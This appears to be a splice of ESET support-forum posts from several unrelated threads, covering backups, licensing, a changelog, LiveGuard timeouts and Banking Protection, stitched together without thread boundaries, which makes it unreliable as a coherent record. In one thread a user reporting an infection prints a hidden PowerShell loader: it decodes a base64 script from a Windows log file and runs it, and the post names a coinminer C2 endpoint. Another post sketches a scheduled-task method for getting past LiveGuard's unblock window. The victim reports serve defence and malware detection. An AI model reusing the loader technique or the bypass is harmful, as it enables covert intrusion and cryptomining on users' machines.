Leonardo

Hello,
I solved my problem; the trick is I had not created my password account on "myESET".

For anyone else in the future who might have this issue and comes across this post:
After doing some poking around myself, I actually got to the bottom of this this morning. This issue was cause by having the "Removable Media Access" option checked under "Scan on" in the "Files system protection" settings.

After turning this off and rebooting, the system returned to normal operations.
From what I could gather, having this option selected meant that at boot, the entirety of my external Time Machine drive was being scanned silently. When Time machine then attempted to launch a backup at the same time, the combination of these simultaneous scans and backups ground the system to a halt. Checking my backup logs, none of my iterative backups had completed since I upgraded to 7.3.3700.0, which is when I selected this option "on", foolishly assuming it'd target USB thumbdrives and the like - That's on me. I ought to have recalled that external USB backup drives count as removable media.
Since turning this option off, the system is under less strain, scand is not out of control, and my backups are completing. 

should i enable diagnostics in pasword manager on my end to help?

license is up on auto extend each month (using smart security premium) but pasword manager keeps poping up license expired mesage even if in its own [settings > my account] it shows it only expires in about month or so.
also password manager icon in browser [firefox 114.0.1 64 bit] keeps flashing with red dot. i have used pasword manager for more than year, switching thru several eset smart security premium licenses (due to having to change payment method or adjust devices amount on license).
pc is basically 24/7 only restarting if some update requares restart (or is system crashes, witch happened like once or twice this year).
shutting down this pc very rarely, like maybe once per month or even rarer
pc runs win 10 pro , i7 10700kf 3,8ghz 8 core cpu, 32 gb ddr4 memory (single channel, single stick).

wait, you already looked to it from your end? thats pleasantly unexpected
huh, i though i would need to give more info and what acount is that, but it seem that eset support is getting info regardless. now thats what i call pro-active support, i wish that other services support would been so active and good as eset is.
other account is on c*@*.com mail, with same buyer info

ESET NOD32 Antivirus, ESET Internet Security and ESET Smart Security Premium version 16.1.14 have been released and are available for download.
Changelog:
Version 16.1.14
NEW: Added Live Tiles on Overview page
NEW: Added new Light / Dark mode switch to GUI
IMPROVED: Additional network details displayed under Network adapters in GUI
FIXED: various fixes and minor improvements
Known issues:
N/A
Upgrade to Latest Version
Upgrade my ESET Windows home product to the latest version
If your ESET security product has not updated automatically yet, you can enforce product update by manually checking for update in the Update panel or wait until it updates automatically.
Support Resources
ESET provides support in the form of Online Help (user guides), fully localized application and Online Help, online Knowledgebase, and applicable to your region, chat, email or phone support.
Online Help (user guides) Visit www.eset.com/contact to email ESET technical support

Hello,
I'm wondering why those who are not satisfied with ESET or worried about these tests did not simply change their AV ?🙄

Yes, it's safe. In 99,9% of cases you get the same modules both from the regular and pre-release update channel. Even in the enterprise environment we recommend updating from the pre-release update channel on a small subset of computers.

i downloaded itman's file from a few posts back and although it's detected as malicious, it's never sent to LG. i even enabled pre-release updates and the program still didn't sent it.

Reviewing my Eset Event log, the answer to why you did not receive a LiveGuard safe verdict is as follows.
It appears Eset designed LiveGuard processing to run silently in the background. That is when a file is submitted to LiveGuard and the file is not determined to be malicious, you will receive no verdict Event log entry. The only time you will receive a LiveGuard safe verdict Event log entry is when you try to access a currently locked file prior to LiveGuard completing its cloud processing.

I had tweaked "30 minutes" for the maximum wait time, it is not possible to choose more time.
I think it is really dangerous without any clear notification saying "safe" or "unsafe" the situation remains ambiguous ; the most secure for the basic user who does not be careful is to block the file till the result of LiveGuard analysis.

Hello @Marcos
I have another problem.
Yesterday a file was sent to LiveGuard at 23:22:56 and 25 minutes later at 23:47:40 the analysis was not finished, but the file was unblocked. I think that it is very dangerous ! And I did not receive any answer later to know if this file is safe or not ?!

I had one that took 35 mins. .................

Eset will unblock a file after the "Maximum wait time for analysis result expires." The default value is 5 mins..
As far as if there is a risk associated with this, theoretically the answer is yes. To exploit this however would require an attacker to perform system modifications prior to the executable/script being dropped. One example would be creating a scheduled task to run every 6 mins. or so that in turn, runs the executable/script.

Please check if the issue with the delay in sending files to LiveGuard persists after switching to the pre-release channel in the advanced update setup.

Hello @Marcos
Thanks for your solution👍
I just uninstalled and reinstalled ESSP and now Banking Protection works fine.

Yesterday, I found some strange internet traffic when I using Wireshark. Then, I use EIS "network connection" tool, found it was created by powershell (I didn't run any powershell). This issue reproduce today.
Conhost.exe and powershell.exe was running background, but I didn't run each of them. Powershell connected to [2606:4700:3031::ac43:9c07]:80 (today the same as yesterday), conhost seems doesn't had any network activity. I use Wireshark to capture packages. then use filter ipv6.addr==2606:4700:3031::ac43:9c07 , then I found it was using HTTP/1.1 with connect method. Please note the strange strings in X-User-Agent. By the way, TLS (TCP-443) and QUIC (UDP-443) was created when I used Sandboxed Firefox visit xttps://private-chatting.com/ and xttps://api.private-chatting.com/ (!!! BE CAREFUL to visit them !!!), these website is using Cloudflare to protect themselves. I use ESET SysInspector to captured a snapshot. I used nslookup to reslove:
C:\Users\Admin>nslookup 2606:4700:3031::ac43:9c07
DNS request timed out.
    timeout was 2 seconds.
服务器:  UnKnown
Address:  192.168.1.1
DNS request timed out.
    timeout was 2 seconds.
*** 请求 UnKnown 超时
C:\Users\Admin>nslookup api.private-chatting.com
DNS request timed out.
    timeout was 2 seconds.
服务器:  UnKnown
Address:  192.168.1.1
非权威应答:
名称:    api.private-chatting.com
Addresses:  2606:4700:3032::6815:38d6
          2606:4700:3031::ac43:9c07
          104.21.56.214
__Today__
 I find the command line parameter of one of the powershell.exe by taskmgr (it cost about 10% CPU): "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer  n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block}
      2. Find C:\Windows\logs\system-logs.txt , find these strings

Snipped: The code was moved to the the attached file to squeeze the post.
 
Please note $EndPointURL = "hxxp://api.private-chatting.com/connect";
It's as same as the URL in pcapng file.



system-logs.txt Strange traffic_20220424.rar
system-logs.rar

A detection will be added: PowerShell/Agent.GZ trojan

hi i have the same process.
how remove it.
i try disable powershell ect... but nothing.
have lock ip in firewall same now new.
how can i do for remove pls ???
ty
 
execute nod32 but found nothing
2606:4700:3032::6815:38d6:80
 

Notice the remote IPv6 address is the same as previously posted that was detected performing coinmining activity.
Also, it is not normal Win system behavior to see PowerShell running as a stand-alone task for an extended period of time.

In regard to the prior PowerShell code posted:

Attacker dropped the coinminer code file previously in highlighted Windows log file directory. Attacker is creating App_V process remotely using Sync-AppPublishingServer.

I am running Win 10 Pro x(64) 21H2 and FireFox 99.0.1 and having no issues with Eset B&PP. I also applied latest Win preview updates yesterday. Also my ESSP ver. is 15.1.12
This issue might be related to Firefox ESR.

Do you have the latest version 15.1.12 installed? If not, try uninstalling the current version, download the installer from www.eset.com and install it. If you have the latest version. Try uninstalling and reinstalling it even if you have have the latest version and the issue persists after a reboot.

It is also noteworthy to review how ESSP performed in AVLab's recent Banking and Payment Protection test: https://avlab.pl/en/overview-of-techniques-and-attacks-in-windows-11/ .  Some work needed by Eset in this area.

This is a wonderful result, I'm glad ESET achieved this result.